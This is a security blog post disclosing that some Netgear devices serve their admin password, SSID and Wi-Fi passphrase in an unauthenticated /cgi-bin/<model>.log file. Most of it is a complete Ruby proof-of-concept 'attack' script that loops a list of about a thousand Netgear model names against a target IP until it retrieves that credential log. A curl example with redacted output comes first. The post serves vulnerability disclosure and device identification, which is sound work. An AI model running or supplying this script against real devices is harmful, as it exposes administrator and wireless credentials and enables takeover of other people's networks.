Adam Caudill

Security Leader, Researcher, Developer, Writer, & Photographer

Netgear Admin Password Disclosure

Some (though not all) Netgear products expose the administrator password to unauthorized users in a file named /cgi-bin/<model>.log – if the device is vulnerable, you’ll get something like this:

>curl http://&lt;ip&gt;/cgi-bin/WNR2000XT.log
Admin login name        admin
Admin password  <snip>
Country Europe
Wireless network name (SSID)    wireless_ext
Wireless channel        6
Security type   WPA2-PSK(AES)
Wireless passphrase     <snip>

The full list of devices that are vulnerable isn’t known; the issue was presented to Netgear, but no response was received. To help identify the vulnerable devices, I pulled a list of all Netgear devices and wrote this script:

#!/usr/bin/env ruby

# Netgear Admin Info Log File Bruteforce PoC
# Copyright 2012 Adam Caudill &lt;adam@adamcaudill.com&gt;
#
# Usage: ruby netgear_adminpass_bt.rb &lt;target-ip&gt;

require 'socket'

PRODUCTS =
["AF711F", "AFM735", "AFT200", "AG711F", "AG711T", "AGM721F", "AGM721T",
"AGM722F", "AGM731F", "AGM732F", "AGM733", "AGM734", "ANT224D10", "ANT2405v1",
"ANT2405v2", "ANT2407", "ANT2409", "ANT2409v1", "ANT2409v2", "ANT24BDC",
"ANT24BNA", "ANT24D18", "ANT24O5", "ANT32405", "APS135W", "APS300W",
"APS525W", "AX741", "AX742", "AX743", "AX744", "AXC761", "AXM751", "AXM752",
"AXM761", "AXM762", "AXM763", "CARP1000", "CG3000", "CG3300D", "CG814M",
"CG814WG", "CGD24G", "CM212", "CMD31T", "CT5B1", "CT5B2", "CT5B6", "CT5W2",
"CT6B1", "CT6B2", "CT6B6", "CVG824G", "DG632", "DG632B", "DG632NA", "DG814",
"DG824M", "DG834B", "DG834Bv2", "DG834Bv3", "DG834Bv4", "DG834GB", "DG834GBv2",
"DG834GNA", "DG834GT", "DG834GUv5", "DG834Gv1", "DG834Gv2", "DG834Gv3",
"DG834Gv4", "DG834Gv5", "DG834GVv1", "DG834GVv2", "DG834Nv1", "DG834Nv2",
"DG834PN", "DG834v1", "DG834v2", "DG834v3", "DG834v4", "DGFV338", "DGN1000",
"DGN2000", "DGN2200", "DGN2200Bv3", "DGN2200M", "DGN2200MB", "DGN2200v1",
"DGN2200v3", "DGN3500", "DGND3300", "DGND3300v1", "DGND3300v2", "DGND3700",
"DGND3700v1", "DGND3700v2", "DGND3800B", "DM111P", "DM111PSPv1", "DM111PSPv2",
"DM111Pv1", "DM111Pv2", "DM602", "DS104", "DS106", "DS108", "DS116", "DS309",
"DS508", "DS516", "DS524", "EA101", "EA201", "EDA4000", "EN104", "EN104TP",
"EN104TPNA", "EN106TP", "EN108", "EN108TP", "EN116", "EN308", "EN308TC",
"EN516", "EN524", "EVA2000", "EVA2200", "EVA5000", "EVA700", "EVA8000",
"EVA9100", "EVA9150", "EVAW111", "FA101", "FA120", "FA310", "FA310TX",
"FA311v1", "FA311v2", "FA312", "FA410", "FA410TX", "FA411", "FA510", "FA511",
"FB105", "FE104", "FE108", "FE116", "FE508", "FE516", "FM114P", "FR114P",
"FR114W", "FR314", "FR318", "FR328S", "FREIGHT", "FS102", "FS104", "FS105",
"FS105NA", "FS105UK", "FS108", "FS108NA", "FS108P", "FS108PNA", "FS116",
"FS116E", "FS116NA", "FS116P", "FS116PNA", "FS205", "FS208", "FS262", "FS305",
"FS308", "FS309T", "FS508", "FS509", "FS509T", "FS510T", "FS516", "FS517TS",
"FS518", "FS518T", "FS524", "FS524S", "FS526T", "FS605NA", "FS605v1",
"FS605v2", "FS605v3", "FS608NA", "FS608v1", "FS608v2", "FS608v3", "FS726",
"FS726AT", "FS726T", "FS726TNA", "FS726TP", "FS726TPNA", "FS728TP",
"FS728TPv1", "FS728TPv2", "FS728TS", "FS750", "FS750AT", "FS750T", "FS750T2",
"FS750T2NA", "FS752TP", "FS752TPS", "FS752TS", "FSM7226RS", "FSM7250RS",
"FSM726", "FSM726E", "FSM726S", "FSM726v1", "FSM726v2", "FSM726v3", "FSM7326P",
"FSM7328PS", "FSM7328S", "FSM7352PS", "FSM7352S", "FSM750S", "FV318",
"FVG318NA", "FVG318v1", "FVG318v2", "FVL328", "FVM318", "FVS114", "FVS124G",
"FVS318G", "FVS318GE", "FVS318N", "FVS318NA", "FVS318v1", "FVS318v2",
"FVS318v3", "FVS328", "FVS336G", "FVS336Gv1", "FVS336Gv2", "FVS338",
"FVS338NA", "FVX538NA", "FVX538v1", "FVX538v2", "FWAG114", "FWG114Pv1",
"FWG114Pv2", "G7328SIP6", "G7352SIP6", "GA302T", "GA311", "GA311NA", "GA511",
"GA620", "GA621", "GA622T", "GC102", "GS104", "GS105", "GS105E", "GS105NA",
"GS108", "GS108E", "GS108Ev1", "GS108Ev2", "GS108NA", "GS108P", "GS108PE",
"GS108PEv1", "GS108PEv2", "GS108T", "GS108Tv1", "GS108Tv2", "GS110T",
"GS110TP", "GS116E", "GS116NA", "GS116v1", "GS116v2", "GS205", "GS208",
"GS308", "GS504", "GS504T", "GS508T", "GS510TP", "GS516T", "GS524T", "GS524TNA",
"GS605", "GS605av", "GS605AV", "GS605NA", "GS608", "GS608AV", "GS608NA",
"GS716T", "GS716TAV", "GS716Tv1", "GS716Tv2", "GS724AT", "GS724T", "GS724TAV",
"GS724TP", "GS724TPS", "GS724TR", "GS724TS", "GS724Tv1", "GS724Tv2", "GS724Tv3",
"GS728TPS", "GS728TS", "GS748AT", "GS748TNA", "GS748TP", "GS748TPS", "GS748TR",
"GS748TS", "GS748Tv1", "GS748Tv2", "GS748Tv3", "GS748Tv4", "GS752TPS",
"GS752TS", "GS752TXS", "GSM5212P", "GSM712", "GSM712F", "GSM7212", "GSM7212F",
"GSM7212P", "GSM7224", "GSM7224P", "GSM7224R", "GSM7224v1", "GSM7224v2",
"GSM7228PL", "GSM7228PS", "GSM7248", "GSM7248R", "GSM7248v1", "GSM7248v2",
"GSM7252PL", "GSM7252PS", "GSM7312", "GSM7324", "GSM7328FL", "GSM7328FS",
"GSM7328S", "GSM7328SO", "GSM7328Sv1", "GSM7328Sv2", "GSM7352S", "GSM7352SO",
"GSM7352Sv1", "GSM7352Sv2", "HA311", "HA501", "HDMG1", "HDMG3", "HDX101",
"HDX111", "HDXB111", "HE102", "HR314", "JDGN1000", "JFS516", "JFS516NA",
"JFS524", "JFS524E", "JFS524F", "JFS524NA", "JGS516", "JGS516NA", "JGS524",
"JGS524E", "JGS524F", "JGS524FNA", "JGS524NA", "JGS524v1", "JGS524v2",
"JGSM7224", "JNR1010", "JNR3000", "JNR3210", "JWNR2000Tv3", "JWNR2000v1",
"JWNR2000v2", "KWGR614", "MA101", "MA111v1", "MA111v2", "MA301", "MA311",
"MA401", "MA521", "MA701", "MBM621", "MBR1200", "MBR1210", "MBR1310",
"MBR624GU", "MBRN3000", "MCA1001v1", "MCA1001v2", "MCAB1001", "ME101", "ME102",
"ME103", "MP101", "MP101REM", "MP115", "MR314", "MR814v1", "MR814v2", "MR814v3",
"MS200", "MS2000", "MS2110", "MS2120", "MVBR1210C", "ND508", "ND520", "NMS100",
"NMS100NA", "NMS200", "NMS2100", "NMS215", "NMS230", "NMS250", "NMS2500",
"NTV200", "NTV200S", "NTV250", "NTV250DU", "NTV340", "NTV350", "NTV550",
"PA101", "PA301", "PE102", "PHS0111", "PHS0112", "PMB0311", "PMB0331NA",
"PMB0332NA", "PMB0333NA", "PMB0334NA", "POE101", "ProLine6100", "PRR0331NA",
"PRR0332", "PRR0333", "PRR0334", "PRR0334E", "PS101v1", "PS101v2", "PS104",
"PS105", "PS110", "PS111W", "PS113", "PS121v1", "PS121v2", "PTV1000", "PTV2000",
"PTVU1000", "R4500", "R6200", "R6300", "RD5200", "RD521210", "RD5D", "RH340",
"RH348", "RM356", "RN00RPL1", "RN00RPL2", "RN00RPL3", "RN12G", "RN12G0620",
"RN12G1220", "RN12P", "RN12P0610", "RN12P0620", "RN12P1210", "RN12P1220",
"RN12P2GE", "RN12PFAN", "RN12PPSU", "RN12PRAIL", "RN12PTRAY", "RN12S",
"RN12S0620", "RN12S1220", "RN12T", "RN12T0620", "RN12T0630", "RN12T1210",
"RN12T1220", "RN12T1230", "RN12T2CX4", "RN12T2SFP", "RND2000", "RND2000v1",
"RND2000v2", "RND2110", "RND2110v1", "RND2110v2", "RND2120", "RND2120v1",
"RND2150", "RND2150v1", "RND2175v1", "RND2210", "RND2210v1", "RND2210v2",
"RND2220", "RND2220v1", "RND4000", "RND4000v1", "RND4000v2", "RND4210",
"RND4210v1", "RND4210v2", "RND4220", "RND4250v1", "RND4410", "RND4410v1",
"RND4410v2", "RND4425v1", "RND4450v1", "RND4FAN1", "RND4M1GB1", "RND4PSU1",
"RND4TRAY1", "RNDP2000", "RNDP200U", "RNDP2210", "RNDP2210D", "RNDP2220",
"RNDP2220D", "RNDP2230", "RNDP2230D", "RNDP4000", "RNDP400U", "RNDP4410",
"RNDP4410D", "RNDP4420", "RNDP4420D", "RNDP4430", "RNDP4430D", "RNDP6000",
"RNDP6000NAS", "RNDP600E", "RNDP600U", "RNDP6310", "RNDP6350", "RNDP6610",
"RNDP6610D", "RNDP6620", "RNDP6620D", "RNDP6630", "RNDP6630D", "RNDTRAY",
"RNDU2000", "RNDU2120", "RNDU2220", "RNDU4000", "RNDU4220", "RNDU6000",
"RNDU6320", "RNDX4000", "RNDX400E", "RNDX4210", "RNDX4250", "RNDX4410",
"RNDX4420", "RNNVR01L", "RNNVR02L", "RNNVR04L", "RNR4000", "RNR4410", "RNR4425",
"RNR4450", "RNR4475", "RNR4FAN1", "RNR4PSU1", "RNR4RL26", "RNR4TRAY1",
"RNR4XCHG", "RNRP4000", "RNRP4410", "RNRP4420", "RNRP4430", "RNRPFAN1",
"RNRPPSU1", "RNRX4000", "RNRX400E", "RNRX4410", "RNRX4410D", "RNRX441E",
"RNRX4420", "RNRX4420D", "RNRX442E", "RNRX4430", "RNRX4430D", "RNRX443E",
"RNRX4450", "RNRXTRAY1", "RNRXXCHG", "RO318", "RP114", "RP334", "RP614NA",
"RP614v1", "RP614v2", "RP614v3", "RP614v4", "RPS5412", "RT311", "RT314",
"RT328", "RT338", "SC101", "SC101T", "SCC", "SPH101", "SPH200D", "SPH200W",
"SRX5308", "SRXN3205", "SSL312", "STM150", "STM150B", "STM150B3", "STM150E",
"STM150E3", "STM150EW", "STM150EW3", "STM150M", "STM150M3", "STM150W",
"STM150W3", "STM300", "STM300B", "STM300B3", "STM300E", "STM300E3", "STM300EW",
"STM300EW3", "STM300M", "STM300M3", "STM300W", "STM300W3", "STM600", "STM600B",
"STM600B3", "STM600E", "STM600E3", "STM600EW", "STM600EW3", "STM600M",
"STM600M3", "STM600W", "STM600W3", "TA612V", "USBG2", "USBG3", "USMG2", "UTM10",
"UTM100", "UTM100B", "UTM100B3", "UTM100E", "UTM100EW", "UTM100EW3", "UTM100M",
"UTM100M3", "UTM100W", "UTM100W3", "UTM10B", "UTM10B3", "UTM10E", "UTM10E3",
"UTM10EW", "UTM10EW3", "UTM10M", "UTM10M3", "UTM10W", "UTM10W3", "UTM150",
"UTM25", "UTM25B", "UTM25B3", "UTM25E", "UTM25E3", "UTM25EW", "UTM25EW3",
"UTM25M", "UTM25M3", "UTM25W", "UTM25W3", "UTM5", "UTM50", "UTM50B", "UTM50B3",
"UTM50E", "UTM50E3", "UTM50EW", "UTM50EW3", "UTM50M", "UTM50M3", "UTM50W",
"UTM50W3", "UTM5B", "UTM5B3", "UTM5E", "UTM5E3", "UTM5EW", "UTM5EW3", "UTM5M",
"UTM5M3", "UTM5W", "UTM5W3", "UTM9S", "VersaLink7500", "VPN01L", "VPN05L",
"VPNG01L", "VPNG05L", "WA301", "WAB102", "WAB501", "WAB502", "WAG102",
"WAG102NA", "WAG302v1", "WAG302v2", "WAG311", "WAG511", "WAG511NA", "WAGL102",
"WC7510L", "WC7520", "WC75NL", "WE102", "WFS709TP", "WG102", "WG102NA", "WG103",
"WG111NA", "WG111T", "WG111U", "WG111US", "WG111v1", "WG111v2", "WG111v3",
"WG121", "WG302NA", "WG302v1", "WG302v2", "WG311NA", "WG311T", "WG311v1",
"WG311v2", "WG311v3", "WG511T", "WG511U", "WG511v1", "WG511v2", "WG602BNA",
"WG602NA", "WG602v1", "WG602v2", "WG602v3", "WG602v4", "WGE101", "WGE101CN",
"WGE111", "WGL102", "WGM124", "WGM511", "WGPS606", "WGPS606NA", "WGR101",
"WGR612", "WGR614L", "WGR614NA", "WGR614v1", "WGR614v10", "WGR614v2",
"WGR614v3", "WGR614v4", "WGR614v5", "WGR614v6", "WGR614v7", "WGR614v8",
"WGR614v9", "WGR826V", "WGT624AU", "WGT624NA", "WGT624SC", "WGT624v1",
"WGT624v2", "WGT624v3", "WGT624v4", "WGT634U", "WGU624", "WGX102v1", "WGX102v2",
"WGXB102", "WIDI1000", "WMS105", "WMS5316", "WN1000RP", "WN111", "WN111v1",
"WN111v2", "WN121T", "WN2000RPT", "WN2000RPTv1", "WN2000RPTv2", "WN2500RP",
"WN3000RP", "WN311B", "WN311T", "WN511B", "WN511T", "WN604", "WN802T",
"WNA1000", "WNA1000M", "WNA1100", "WNA3100", "WNA3100M", "WNAP210", "WNAP320",
"WNB2100", "WNCE2001", "WNCE2004", "WNCE3001", "WNDA3100", "WNDA3100v1",
"WNDA3100v2", "WNDA4100", "WNDAP330", "WNDAP350", "WNDAP360", "WNDAP380R",
"WNDAP620", "WNDR3300", "WNDR3300v1", "WNDR3300v2", "WNDR3400", "WNDR3400v1",
"WNDR3400v2", "WNDR3600v3", "WNDR3700", "WNDR3700v1", "WNDR3700v2",
"WNDR3700v3", "WNDR37AV", "WNDR37AVv1", "WNDR37AVv2", "WNDR3800", "WNDR4000",
"WNDR4500", "WNDRMACv1", "WNDRMACv2", "WNHD3004", "WNHD3004v2", "WNHDE111",
"WNR1000", "WNR1000v1", "WNR1000v2", "WNR1000v3", "WNR1500", "WNR2000",
"WNR2000v1", "WNR2000v2", "WNR2000v3", "WNR2000XT", "WNR2200", "WNR3500",
"WNR3500L", "WNR3500Lv1", "WNR3500Lv2", "WNR3500v1", "WNR3500v2", "WNR500",
"WNR612", "WNR612v2", "WNR612v3", "WNR834Bv1", "WNR834Bv2", "WNR834M",
"WNR854T", "WNXR2000", "WNXR2100", "WPN111", "WPN111RV", "WPN311", "WPN511",
"WPN511RV", "WPN802v1", "WPN802v2", "WPN824EXT", "WPN824N", "WPN824v1",
"WPN824v2", "WPN824v3", "WPNT121", "WPNT511", "WPNT834", "XA601", "XAUB2511",
"XAV1004", "XAV101v1", "XAV101v2", "XAV1101", "XAV1201", "XAV1301v1",
"XAV1301v2", "XAV1501", "XAV1601", "XAV2001", "XAV2101v1", "XAV2101v2",
"XAV2501", "XAV2602", "XAV5001", "XAV5004", "XAV5101", "XAV5201", "XAV5501",
"XAV5601", "XAVB1001", "XAVB1004", "XAVB101", "XAVB1101", "XAVB1201",
"XAVB1301v1", "XAVB1301v2", "XAVB1401", "XAVB1501", "XAVB2001", "XAVB2101v1",
"XAVB2101v2", "XAVB2501", "XAVB2602", "XAVB2602v2", "XAVB5001", "XAVB5004",
"XAVB5101", "XAVB5201", "XAVB5501", "XAVB5601", "XAVB5602", "XAVN2001",
"XAVNB2001", "XAVT5601", "XCM8806", "XCM8810", "XE102v1", "XE102v2", "XE103",
"XE104", "XE104NA", "XE602", "XEB1004", "XEPS103", "XET1001", "XETB1001",
"XETB10GM", "XM128", "XSM7224L", "XSM7224S"]

PORT = 80
host = ARGV[0]

puts "Starting attack, this might take a while..."

begin
  result = nil
  puts "Connecting to #{host}:#{PORT}..."

  PRODUCTS.each_with_index do |product, index|
    puts "Sending request #{index}..." if index % 100 == 0
    sock = TCPSocket.open(host, PORT)
    sock.write("GET /cgi-bin/#{product}.log HTTP/1.1\r\nHost: #{host}\r\n\r\n")

    response = sock.recv(2048)
    sock.close

    if response.inspect.include? "Admin login name"
      result = response
      puts result
      break
    end
  end

  puts "No results found - product/version doesn't seem vulnerable" if result == nil
rescue ::Exception =&gt; e
  puts e
  abort
rescue ::Interrupt
  abort "\r\nExiting on interrupt"
end

Adam Caudill